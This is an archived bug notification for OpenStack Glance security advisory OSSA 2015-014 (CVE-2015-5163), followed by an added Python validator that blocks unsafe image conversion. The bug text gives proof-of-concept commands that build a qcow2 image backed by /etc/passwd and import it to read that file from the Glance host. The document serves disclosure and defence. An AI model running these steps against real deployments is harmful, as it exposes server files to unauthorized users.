yahoo-eng-team team mailing list archive

[Bug 1471912] Re: [OSSA 2015-014] Format-guessing and file disclosure via image conversion (CVE-2015-5163)

 

** Changed in: glance
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1471912

Title:
  [OSSA 2015-014] Format-guessing and file disclosure via image
  conversion (CVE-2015-5163)

Status in Glance:
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  This is a security flaw that allows files from the Glance host to be
  obtained by a user.

  I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
  [taskflow_executor]
  engine_mode=serial      # not sure if needed
  conversion_format=raw

  Make a malicious image available via HTTP.
  $ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
  $ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image

  $ glance --os-image-api-version 2 task-create --type import --input '{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image", "image_properties": {"name": "my_image_test", "disk_format": "qcow2", "container_format": "bare"}}'
  $ glance image-download my_image_test --file downloaded_image
  $ head downloaded_image
  <contents from /etc/passwd on the Glance host>

  This happens because Glance runs this command which doesn't specify a format, and uses qemu-img's format auto-detection:
  qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4 /tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted

  Similar to Cinder bug 1415087.

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1471912/+subscriptions
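
Added example, not part of the original bug report and not Glance's own code: a pre-conversion check that rejects an image whose detected format differs from the declared one or that references a backing file, and builds the convert command with an explicit source format. The function names and the sample `qemu-img info --output=json` documents are constructed for illustration.

```python
import json

# Constructed samples: the shape of `qemu-img info --output=json` output for
# an image like the one in the report (qcow2 with a backing file) and for a
# plain qcow2 image.
SAMPLE_WITH_BACKING = json.dumps({
    "filename": "/tmp/upload", "format": "qcow2",
    "virtual-size": 1048576, "backing-filename": "/etc/passwd",
})
SAMPLE_CLEAN = json.dumps({
    "filename": "/tmp/upload", "format": "qcow2", "virtual-size": 1048576,
})


class UnsafeImage(ValueError):
    """Raised when an uploaded image must not be handed to qemu-img convert."""


def validate_image_info(info_json, declared_format):
    """Check `qemu-img info` JSON output before any conversion runs."""
    info = json.loads(info_json)
    detected = info.get("format")
    # Format-guessing: the content does not match what the user declared.
    if detected != declared_format:
        raise UnsafeImage("declared %s, detected %s" % (declared_format, detected))
    # File disclosure: the image points at another file on the host.
    for key in ("backing-filename", "full-backing-filename"):
        if info.get(key):
            raise UnsafeImage("image references backing file %r" % info[key])
    return info


def build_convert_cmd(src, dst, declared_format, out_format="raw"):
    """Build the convert argv with an explicit source format (-f)."""
    return ["qemu-img", "convert", "-f", declared_format,
            "-O", out_format, src, dst]
```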